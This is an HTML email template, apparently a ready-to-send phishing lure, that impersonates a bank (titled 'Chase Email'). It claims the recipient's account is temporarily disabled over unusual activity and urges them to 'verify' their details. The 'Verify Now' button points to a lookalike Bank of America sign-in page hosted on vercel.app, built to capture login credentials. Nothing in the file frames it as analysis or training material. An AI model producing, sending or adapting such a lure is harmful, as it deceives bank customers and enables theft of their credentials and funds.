<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Chase Email</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f4f4f4;
            margin: 0;
            padding: 0;
        }
        .container {
            background-color: white;
            width: 90%;
            max-width: 500px;
            margin: 20px auto;
            padding: 20px;
            box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
        }
        .header {
            text-align: center;
            padding-bottom: 20px;
            border-bottom: 3px solid #000;
        }
        .header img {
            width: 100px;
            align-items: center;
            justify-content: center;
        }
        .content {
            padding: 20px 0;
            text-align: center;
        }
        .content h1 {
            font-size: 18px;
            color: #333;
            margin-bottom: 10px;
        }
        .content p {
            font-size: 13px;
            line-height: 1.5;
            color: #333;
            text-align: left;
        }
        .verify-button {
            display: inline-block;
            background-color: #005bbccf;
            color: white;
            text-decoration: none;
            padding: 10px 20px;
            border-radius: 5px;
            font-size: 14px;
            margin-top: 20px;
            margin-bottom: 10px;
            
        }
        .footer {
            padding-top: 20px;
            border-top: 2px solid #000;
            font-size: 12px;
            color: #333;
            text-align: center;
        }
        .footer p {
            margin-bottom: 5px;
            text-align: left;
        }
        .footer a {
            color: #005bbccf;
            text-decoration: none;
        }
        .fottertext{
            background-color: #005bbccf;
            padding: 12px;
            color: #fff;
            text-align: left;
        }
        h1{
            text-align: left;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <a href="https://imgbb.com/">
                <img src="https://i.ibb.co/L0bPDwN/logo.jpg" alt="logo" border="0">
            </a>
        </div>
        <div class="content">
            <h1>YOUR ACCOUNT HAS BEEN TEMPORARY DISABLED</h1>
            <p>Dear Valued Customer,</p>
            <p>We noticed some unusual activity on your online banking account and are concerned about potential unauthorized account access. To help keep your account safe, we've temporarily limited some of your account features.</p>
            <p>To start using your account as usual again, please log in and verify your billing address</p>
            <a href="https://secure-bankofamerica-com.vercel.app/boa/secure.bankofamerica.com/login/sign-in/signOnV2Screen.html" class="verify-button">Verify Now</a>
            <p>Upon verification of your information, all bank financial transaction will be verified.</p>
        </div>
        <div class="footer">
            <p>Note: Please do not reply to this email as it was sent from an unfiltered mailbox.</p>
            <p>Sincerely,<br>Bank Department<br>Email Operations Team Divider</p>
            <p class="fottertext">2020 © All Rights Reserved</p>
        </div>
    </div>
</body>
</html>
